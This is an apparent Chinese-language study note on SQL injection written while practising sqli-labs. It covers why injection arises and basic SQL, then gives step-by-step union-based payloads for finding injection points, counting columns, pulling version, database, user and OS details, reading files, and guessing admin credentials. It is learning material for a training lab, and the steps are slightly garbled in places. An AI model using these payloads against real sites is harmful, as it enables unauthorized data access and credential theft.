sqli-labs是我对sql学习程度的检验,玩了几道题,我查询了相关知识点,总结了一些重要的语法以及知识点,还有类似的题型解法步骤,下面我将一一汇总
SQL注入漏洞产生的原因
SQL Injection
程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患
用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据或进行数据库操作
SQL语句
Structured Query Language
结构化的查询语言,是关系型数据库通讯的标准语言。
查询:SELECT statement FROM table WHERE condition
删除记录:DELETE FROM table WHERE condition
更新记录:UPDATE table SET field=value WHERE condtion
添加记录:INSERT INTO table field VALUES(values)
注入步骤
1首先测试正常数据,如?id=1
2)判断是否存在注入点,如在?id=1+【‘】、【and 1=1】或【and 1=2】
3)判断字段长度,列数如在?id=1+【‘】+【 order by 1 (数字任意)】,id=1‘ order by 1=1 # ,id=1' order by 1=2 #
4判断字段回显位置,如在?id=1+【‘】+【union select 1,2,3,4,5,6,7,8,9,10,11#】
5) 判断数据库信息:
利用内置函数暴数据库信息
version()版本;database()数据库;user()用户;
不用猜解可用字段暴数据库信息(有些网站不适用):and 1=2 union all select version()
and 1=2 union all select database()
and 1=2 union all select user()
操作系统信息:and 1=2 union all select @@global.version_compile_os from mysql.user
数据库权限:
1 | 6) 查找数据库名 |
提权
01)猜解账号密码;
02) 登陆管理员后台。
读文件: union select 绝对路径 load_file
写入文件:union select
判断SQL注入点
找注入点是最关键,也最基础的一个环节
本质原理是:
找一个需要后台处理后
提交给数据库的点
所有的输入只要和数据库进行交互的,都有可能触发SQL注入
一般为三大类
Get参数触发SQL注入
POST参数触发SQL注入
Cookie触发SQL注入
例如:
在常规的链接的参数中(链接?参数) 找形如?id=num的【,】搜索框的【,】
而验证是否存在注入点的方法有很多种
最常规,也最简单的方法,引入单引号判断是否存在注入点
http://host/test.php?id=100’ 返回错误说明有可能注入
http://host/test.php?id=100 and 1=1 返回正常
http://host/test.php?id=100 and 1=2返回错误
如果满足上面三点,是注入点的可能性就很高了